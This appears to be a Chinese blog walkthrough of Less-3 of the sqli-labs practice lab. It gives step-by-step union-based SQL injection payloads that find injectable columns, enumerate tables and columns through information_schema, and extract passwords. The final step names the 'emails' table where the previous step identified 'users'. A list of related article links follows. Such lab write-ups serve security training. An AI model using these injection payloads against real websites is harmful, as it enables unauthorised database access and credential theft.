Sqli-labs 3

1.按照路径http://localhost/sqli-labs/sqli-labs-master/Less-3/进入

2.判断注入类型----字符型

Payload:?id=1') and 1=1--+

注:根据报错提示的语法错误,在第一行中使用接近'union select 1,2,3--')的正确语法

3.判断注入点:2,3

Payload:id=-1') union select 1,2,3 --+

4. 根据注入点查询指定数据库名----security

Payload:id=-1') union select 1,database(),3 --+

5.查询指定数据库名下的表名

Payload:

id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

6.查询指定表----users下的字段名

Payload:

id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

7.查询指定字段名:password

Payload:

id=-1') union select 1,password,3 from emails--+

相关推荐
老纪的技术唠嗑局9 分钟前
重剑无锋,大巧不工 —— OceanBase 中的 Nest Loop Join 使用技巧分享
数据库·sql
未来之窗软件服务37 分钟前
JAVASCRIPT 前端数据库-V6--仙盟数据库架构-—-—仙盟创梦IDE
数据库·数据库架构·仙盟创梦ide·东方仙盟·东方仙盟数据库
寒山李白40 分钟前
MySQL复杂SQL(多表联查/子查询)详细讲解
sql·mysql·子查询·多表联查
ALLSectorSorft1 小时前
上门服务小程序会员系统框架设计
小程序·apache
一只爱撸猫的程序猿2 小时前
构建一个简单的智能文档问答系统实例
数据库·spring boot·aigc
nanzhuhe2 小时前
sql中group by使用场景
数据库·sql·数据挖掘
消失在人海中2 小时前
oracle sql 语句 优化方法
数据库·sql·oracle
Clang's Blog2 小时前
一键搭建 WordPress + MySQL + phpMyAdmin 环境(支持 PHP 版本选择 & 自定义配置)
数据库·mysql·php·wordpr
zzc9212 小时前
MATLAB仿真生成无线通信网络拓扑推理数据集
开发语言·网络·数据库·人工智能·python·深度学习·matlab
杨过姑父3 小时前
部署开源版禅道,修改apache端口无效解决
bug·apache·软件工程·issue